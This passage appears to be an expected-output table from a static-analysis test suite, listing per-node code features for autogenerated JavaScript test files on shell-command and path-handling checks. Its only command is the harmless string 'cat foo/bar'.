fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:30:162:32 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:39:162:45 | console | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:39:162:45 | console | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:39:162:45 | console | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:39:162:45 | console | enclosingFunctionName | execmod#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:39:162:45 | console | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:39:162:49 | console.log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:39:162:49 | console.log | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:39:162:49 | console.log | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:39:162:49 | console.log | enclosingFunctionName | execmod#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:39:162:49 | console.log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:39:162:54 | console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:39:162:54 | console.log(out) | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:39:162:54 | console.log(out) | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:39:162:54 | console.log(out) | enclosingFunctionName | execmod#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:39:162:54 | console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:39:162:54 | exceptional return of console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:39:162:54 | exceptional return of console.log(out) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:39:162:54 | exceptional return of console.log(out) | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:39:162:54 | exceptional return of console.log(out) | enclosingFunctionName | execmod#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:39:162:54 | exceptional return of console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:47:162:49 | log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:47:162:49 | log | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:47:162:49 | log | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:47:162:49 | log | enclosingFunctionName | execmod#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:47:162:49 | log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:51:162:53 | out | CalleeFlexibleAccessPath | console.log | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:51:162:53 | out | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:51:162:53 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:51:162:53 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:51:162:53 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:51:162:53 | out | enclosingFunctionName | execmod#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:51:162:53 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:51:162:53 | out | receiverName | console | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:1:163:7 | execmod | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:1:163:7 | execmod | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:1:163:7 | execmod | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:1:163:42 | exceptional return of execmod ... utf8'}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:1:163:42 | exceptional return of execmod ... utf8'}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:1:163:42 | exceptional return of execmod ... utf8'}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:1:163:42 | execmod ... utf8'}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:1:163:42 | execmod ... utf8'}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:1:163:42 | execmod ... utf8'}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:9:163:21 | "cat foo/bar" | CalleeFlexibleAccessPath | execmod | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:9:163:21 | "cat foo/bar" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:9:163:21 | "cat foo/bar" | calleeImports | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:9:163:21 | "cat foo/bar" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:9:163:21 | "cat foo/bar" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:9:163:21 | "cat foo/bar" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:24:163:41 | {encoding: 'utf8'} | CalleeFlexibleAccessPath | execmod | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:24:163:41 | {encoding: 'utf8'} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:24:163:41 | {encoding: 'utf8'} | calleeImports | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:24:163:41 | {encoding: 'utf8'} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:24:163:41 | {encoding: 'utf8'} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:24:163:41 | {encoding: 'utf8'} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:25:163:32 | encoding | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:25:163:32 | encoding | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:25:163:32 | encoding | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:25:163:40 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:25:163:40 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:25:163:40 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:25:163:40 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:25:163:40 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:25:163:40 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:35:163:40 | 'utf8' | CalleeFlexibleAccessPath | execmod | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:35:163:40 | 'utf8' | InputAccessPathFromCallee | 1.encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:35:163:40 | 'utf8' | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:35:163:40 | 'utf8' | assignedToPropName | encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:35:163:40 | 'utf8' | calleeImports | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:35:163:40 | 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:35:163:40 | 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:35:163:40 | 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:1:164:7 | execmod | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:1:164:7 | execmod | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:1:164:7 | execmod | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:1:164:76 | exceptional return of execmod ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:1:164:76 | exceptional return of execmod ... (out)}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:1:164:76 | exceptional return of execmod ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:1:164:76 | execmod ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:1:164:76 | execmod ... (out)}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:1:164:76 | execmod ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:9:164:21 | "cat foo/bar" | CalleeFlexibleAccessPath | execmod | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:9:164:21 | "cat foo/bar" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:9:164:21 | "cat foo/bar" | calleeImports | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:9:164:21 | "cat foo/bar" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:9:164:21 | "cat foo/bar" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:9:164:21 | "cat foo/bar" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:24:164:41 | {encoding: 'utf8'} | CalleeFlexibleAccessPath | execmod | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:24:164:41 | {encoding: 'utf8'} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:24:164:41 | {encoding: 'utf8'} | calleeImports | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:24:164:41 | {encoding: 'utf8'} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:24:164:41 | {encoding: 'utf8'} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:24:164:41 | {encoding: 'utf8'} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:25:164:32 | encoding | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:25:164:32 | encoding | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:25:164:32 | encoding | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:25:164:40 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:25:164:40 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:25:164:40 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:25:164:40 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:25:164:40 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:25:164:40 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:35:164:40 | 'utf8' | CalleeFlexibleAccessPath | execmod | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:35:164:40 | 'utf8' | InputAccessPathFromCallee | 1.encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:35:164:40 | 'utf8' | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:35:164:40 | 'utf8' | assignedToPropName | encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:35:164:40 | 'utf8' | calleeImports | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:35:164:40 | 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:35:164:40 | 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:35:164:40 | 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:44:164:75 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:44:164:75 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:44:164:75 | 'arguments' object of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:44:164:75 | 'arguments' object of anonymous function | enclosingFunctionName | execmod#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:44:164:75 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:44:164:75 | (err, o ... g(out)} | CalleeFlexibleAccessPath | execmod | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:44:164:75 | (err, o ... g(out)} | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:44:164:75 | (err, o ... g(out)} | calleeImports | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:44:164:75 | (err, o ... g(out)} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:44:164:75 | (err, o ... g(out)} | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:44:164:75 | (err, o ... g(out)} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:44:164:75 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:44:164:75 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:44:164:75 | exceptional return of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:44:164:75 | exceptional return of anonymous function | enclosingFunctionName | execmod#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:44:164:75 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:44:164:75 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:44:164:75 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:44:164:75 | return of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:44:164:75 | return of anonymous function | enclosingFunctionName | execmod#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:44:164:75 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:45:164:47 | err | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:45:164:47 | err | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:45:164:47 | err | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:45:164:47 | err | enclosingFunctionName | execmod#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:45:164:47 | err | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:50:164:52 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:50:164:52 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:50:164:52 | out | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:50:164:52 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:50:164:52 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:50:164:52 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:50:164:52 | out | enclosingFunctionName | execmod#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:50:164:52 | out | enclosingFunctionName | execmod#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:50:164:52 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:50:164:52 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:59:164:65 | console | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:59:164:65 | console | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:59:164:65 | console | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:59:164:65 | console | enclosingFunctionName | execmod#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:59:164:65 | console | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:59:164:69 | console.log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:59:164:69 | console.log | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:59:164:69 | console.log | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:59:164:69 | console.log | enclosingFunctionName | execmod#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:59:164:69 | console.log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:59:164:74 | console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:59:164:74 | console.log(out) | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:59:164:74 | console.log(out) | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:59:164:74 | console.log(out) | enclosingFunctionName | execmod#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:59:164:74 | console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:59:164:74 | exceptional return of console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:59:164:74 | exceptional return of console.log(out) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:59:164:74 | exceptional return of console.log(out) | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:59:164:74 | exceptional return of console.log(out) | enclosingFunctionName | execmod#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:59:164:74 | exceptional return of console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:67:164:69 | log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:67:164:69 | log | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:67:164:69 | log | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:67:164:69 | log | enclosingFunctionName | execmod#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:67:164:69 | log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:71:164:73 | out | CalleeFlexibleAccessPath | console.log | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:71:164:73 | out | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:71:164:73 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:71:164:73 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:71:164:73 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:71:164:73 | out | enclosingFunctionName | execmod#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:71:164:73 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:71:164:73 | out | receiverName | console | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:1:1:0 | this | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:1:1:1 | join | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:1:1:1 | join | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:1:1:1 | join | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:1:1:1 | parse | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:1:1:1 | parse | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:1:1:1 | parse | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:1:1:1 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:1:1:1 | readFileSync | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:1:1:1 | readFileSync | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:1:1:34 | import ... m 'fs'; | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:1:1:34 | import ... m 'fs'; | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:1:1:34 | import ... m 'fs'; | fileImports | fs http path url | +| 